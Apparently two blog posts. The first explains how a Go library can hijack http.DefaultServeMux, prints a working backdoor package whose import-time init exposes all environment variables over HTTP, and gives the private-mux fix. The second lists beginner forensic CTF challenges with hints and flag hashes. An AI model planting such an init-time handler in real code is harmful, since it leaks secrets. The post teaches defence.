Avoid using golang http.DefaultServeMux for production servers

I have seen many guides and posts showing a handy and simple way to create a web server in Go like this:

package main

import (
    "fmt"
    "log"
    "net/http"
)

func main() {
    http.HandleFunc("/ping", func(w http.ResponseWriter, r *http.Request) {
        fmt.Fprintf(w, "pong")
    })

    fmt.Printf("Starting server at port 8080\n")
    // A nil handler means the server dispatches every request through http.DefaultServeMux.
    if err := http.ListenAndServe(":8080", nil); err != nil {
        log.Fatal(err)
    }
}

Internally, http.HandleFunc and http.Handle register the handler (or handler function) in DefaultServeMux. The problem is that DefaultServeMux is a global, exported variable.

An attacker might develop a malicious library, or hijack an existing one, and attach a handler to DefaultServeMux, for example from an init function, which runs as soon as the package is imported:

package evillogger

import (
	"encoding/json"
	"net/http"
	"os"
	"strings"
)

// init runs automatically when the package is imported, so the route below is
// registered as a side effect of the import alone.
func init() {
	someBoringSetUp()
}

func someBoringSetUp() {
	// Registers on http.DefaultServeMux, the mux that http.ListenAndServe(":8080", nil) serves.
	http.HandleFunc("/xd", commonAndBoringFunctionname)
}

// commonAndBoringFunctionname dumps the process environment to whoever requests /xd.
func commonAndBoringFunctionname(w http.ResponseWriter, r *http.Request) {
	type osenv struct {
		Key   string
		Value string
	}
	envs := []osenv{}
	for _, element := range os.Environ() {
		// SplitN keeps values that themselves contain "=" intact.
		variable := strings.SplitN(element, "=", 2)
		envs = append(envs, osenv{Key: variable[0], Value: variable[1]})
	}
	_ = json.NewEncoder(w).Encode(map[string]interface{}{"injected": &envs})
}

It is not hard to hide or obfuscate code in a large project or codebase, but the way to mitigate this problem is quite simple: just create a new server mux:

serverMux := http.NewServeMux()
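The mitigation end to end, as an added example that is not part of the original post: the server routes only through a private mux, and a small helper (routeStatus, my own name) shows that a route a dependency sneaked onto DefaultServeMux is not reachable through it. The "/injected" registration in main stands in for a malicious init.

```go
package main

import (
	"fmt"
	"log"
	"net/http"
	"net/http/httptest"
)

// newRouter builds a private ServeMux. Only handlers registered here are
// reachable; anything a dependency registers via http.HandleFunc lands on
// http.DefaultServeMux, which this server never hands to ListenAndServe.
func newRouter() *http.ServeMux {
	mux := http.NewServeMux()
	mux.HandleFunc("/ping", func(w http.ResponseWriter, r *http.Request) {
		fmt.Fprint(w, "pong")
	})
	return mux
}

// routeStatus reports the HTTP status a mux returns for a GET on path,
// using an in-memory recorder so no socket is needed.
func routeStatus(mux http.Handler, path string) int {
	rec := httptest.NewRecorder()
	mux.ServeHTTP(rec, httptest.NewRequest(http.MethodGet, path, nil))
	return rec.Code
}

func main() {
	// Constructed stand-in for a dependency's init() registering on the global mux.
	http.HandleFunc("/injected", func(w http.ResponseWriter, r *http.Request) {
		fmt.Fprint(w, "leak")
	})

	mux := newRouter()
	fmt.Printf("/ping on private mux: %d\n", routeStatus(mux, "/ping"))                // 200
	fmt.Printf("/injected on private mux: %d\n", routeStatus(mux, "/injected"))        // 404
	fmt.Printf("/injected on DefaultServeMux: %d\n", routeStatus(http.DefaultServeMux, "/injected")) // 200

	// Pass the private mux instead of nil.
	if err := http.ListenAndServe(":8080", mux); err != nil {
		log.Fatal(err)
	}
}
```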

In my opinion the biggest and most important lesson is not to add untrusted third-party libraries without at least a minimum of verification.

Forensic CTF for new college students

Introduction

Some time ago I was entrusted with the task of designing some exercises to be part of a CTF whose aim was to introduce information security concepts to first-year university students with no previous experience in the field. I found this task quite difficult, as striking the right balance in the difficulty of the exercises turned out not to be as easy as I thought. I decided to focus on the forensics area because it was straightforward for me to draw a parallel with what a police detective would have to do, and at the same time it allows students to learn about protocols like TCP and HTTP and tools like Wireshark, scapy, hexdump, etc. I hope you enjoy them as much as I enjoyed creating them. Good luck.

Challenge 1: Mobs chat

The International Committee of Investigations is trying to catch a well-known Argentinian mobster named Mario. Last week one of Mario's minions was captured along with a list of future victims. However, the list is encrypted, and only with the password (the flag) can it be decrypted. According to Mario's psychological profile, he usually uses the same password pattern: a master password plus the name of one of his pets. We paid a group of hackers who provided us with a traffic capture of Mario's computer. Will you be able to find the flag?

Mario network traffic pcap

Hint: Mario frequents unsafe chat sites.
MD5 Flag: df5738a7e288813c2c0e84de74749f9e

Challenge 2: Urgent data leak

It is suspected that the security of a computer has been compromised and that the attackers are stealing information in some way and sending it to their server, so we proceeded to capture network traffic from this computer and try to analyze what is happening. The objective is to find the flag that the attackers are stealing.

Network traffic pcap

Hint: There are some tasks that you have to do urgently.
MD5 Flag: 03a0788654dbf801bb3d84bb252cd67c

Challenge 3: PDF RFC

The famous conclave of people who designed the PDF format decided, on a leisurely afternoon, to write a small RFC briefly describing the format itself. Bored with this task, and knowing in detail how it works, they decided to hide a little message somewhere in the file. Can you find it?

Rfc37778 pdf

MD5 Flag: 522bbad8370d66c1ed001c5a104593f8